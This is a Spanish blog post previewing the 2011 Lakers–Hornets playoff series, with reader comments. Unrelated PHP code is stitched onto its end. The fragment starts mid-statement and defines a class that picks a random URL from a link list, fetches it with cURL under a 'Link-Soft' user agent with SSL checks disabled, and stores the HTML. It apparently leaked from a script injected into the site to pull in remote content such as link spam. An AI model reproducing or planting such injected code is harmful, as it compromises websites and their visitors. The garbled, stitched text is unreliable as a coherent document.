Análisis Los Angeles Lakers vs New Orleans Hornets

16 de April de 2011 por TheDeerHunter

Regular: 4-0 Lakers

Lakers 101.5 PF – 95.4 PC (+6.1)
Hornets 94.9 PF – 94 PC (+0.9)

Los campeones comienzan su andadura por la postemporada como todos los años: Críticas a mansalva, y dudas con el físico de Bynum, la contribución de Fisher y Artest, el ego de Kobe, la blandura y blancura de Gasol, la cabecita de Odom y la profundidad/fiabilidad del resto del banquillo. Los campeones más criticados de la historia, sin duda. Nada nuevo y el mismo balance “mediocre” de dos de las tres últimas temporadas, con los resultados finales por todos conocidos.

Posiblemente estas críticas son más merecidas que nunca. Con la plantilla más completa de la era Gasol y el mejor estado de salud de los últimos años, los amarillos se han entregado en demasiadas fases de la campaña a su estado preferido de “se dejaba llevar” logrando algunas de las peores rachas de resultados y humillaciones con Phil Jackson al mando de la nave.

Curiosamente ese discutible rendimiento en esta fase de competición les ha traído un premio: el (posiblemente) rival más sencillo del cuadro del Oeste, sólo por delante de Indiana como equipo más flojos d toda la postemporada. Los peores atacando, los peores reboteando, los peores pasando… Sólo la defensa es digna de un equipo de postemporada pero todos sabemos que únicamente de defensa no se puede vivir a estas alturas.

Al final, todo el mundo es consciente de que la verdadera temporada de un equipo campeón comienza ahora. De nada sirve deslumbrar en la regular si luego te elimina el 8º a las primeras de cambio. La primera batalla que se debe afrontar es contra uno mismo. El mayor enemigo de los Lakers en esta primera fase son los propios Lakers. Es el momento de cambiar el chip a modo anillo.

Claves de la eliminatoria:

Las torres: Sin David West y con Bynum mínimamente sano se antoja demasiada la ventaja que tienen los amarillos en un aspecto tan decisivo como el juego interior. Aún con West, los Pau, Bynum y Odom combinaron más de 50 puntos, 26 rebotes y 4 tapones por encuentro en la fase regular. Okafor es un digno defensor y Landry ya se las hizo pasar canutas en aquella eliminatoria con los “pequeños” Rockets de hace dos temporadas. Sin embargo no parecen suficiente para oponer verdadera resistencia. Por detrás de ellos están Smith, Gray y Mbenga. Telita fina.

El talón de Aquiles: Siempre es lo mismo. La sensación es que Chris Paul debería estar frotándose las manos por el baile que le va a pegar al viejo Fisher. Será un factor a cuidar, por supuesto, pero la realidad posiblemente no sea para tanto. Ningún base con conocimiento, por muy talentoso que sea, debería estar tranquilo con Fisher delante en un partido decisivo de playoffs.

Ariza vs Artest: Dos piezas clave en los dos últimos campeonatos de los Lakers. Los que mejoraron el rendimiento del mítico jugador y mejor persona Radmanovic. Ya pocos se acuerdan lo polémico de aquel cambio. Quizás no sea tanto por el rendimiento constante de Ron Ron sino por la irregularidad del juego de Ariza. En cualquier caso intuyo que veremos la mejor versión del ex-alero titular amarillo, o al menos la más motivada, así como que tendrá un hueso muy duro delante si Artest decide ponerse a hacer lo que sabe.

La Mamba libre: Nadie en su sano juicio puede pensar que Bellinelli tiene opciones de parar lejanamente a Kobe. En la regular, sin despeinarse, les endosaba 27 por noche. En esa posición el mejor de los Hornets contra L.A. había sido Thornton. Le echarán de menos. Williams va a tener que revisar sus sistemas defensivos para evitar una sangría. ¿Ariza sobre Kobe?

Límite 100 puntos: Por muy buena defensa que tengan parece improbable que los Hornets puedan ganar algún partido a los Lakers anotando menos de 100 puntos. Hito difícil para ellos.

Pronóstico: 4-0 Lakers.

Comenta

10 comentarios a esta entrada

  1. Vader dice:
    #1

    Pues si, yo tambien supongo que Ariza será el primer defensor de Kobe.

    Saludos!!

      Citar

  2. Ru dice:
    #2

    Lo mismo de siempre,4-0 para Lakers y a segunda ronda mientras los rivales comienzan a sufrir el desgaste.

      Citar

  3. Javijaen dice:
    #3

    Bueno, un 4-1 para LA, que algo rascará el amigo Paul…

      Citar

  4. Txusma dice:
    #4

    Clarísimamente, Ariza defenderá a Kobe. Artest es muy capaz de defenderse solo.

    Si la cosa no acaba 4-0, es para que los amarillos se lo hagan mirar.

      Citar

  5. KB # 24 dice:
    #5

    Cuándo sabremos los ganadores de los premios individuales?

      Citar

  6. HisRoyalAirness dice:
    #6

    Artest cuando hace lo que sabe es un hueso muy duro de roer. El otro dIa en retransmisión pusieron los promedios y porcentajes de KD contra Lakers este año en RS y bajaban una barbaridad

      Citar

  7. Denise dice:
    #7

    4-1 y porque los Lakers tienden a relajarse cuando tienen la situación controlada.
    Junto con el Chicago-Indiana, es la eliminatoria mas desequilibrada, y yo tambien creo que Ariza será quien empiece defendiendo a Bryant.

      Citar

  8. Jabho dice:
    #8

    Sip, se una eliminatoria muy sencilla para los amarillos….

      Citar

  9. German dice:
    #9

    4-0 los angelinos, bastante tranquilos, Kobe y Pau haran destrozos.

      Citar

  10. Denise dice:
    #10

    ZAS.
    ¿Que habrán estado haciendo Gasol Y Odom estos dias? Vaya partido de Pau, y de la zona angelina, Aaron Gray, Landry y compañia ni se lo estarán creyendo todavía. Bestial el destrozo de Paul y Jack a los bases-escoltas de Lakers.
    Partidazo de Bryant y Artest que no ha servido para nada.
    Ariza, horrible, está para echarlo a los lobos.
    Se avecina reunión urgente y bronca de la buena en L.A.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>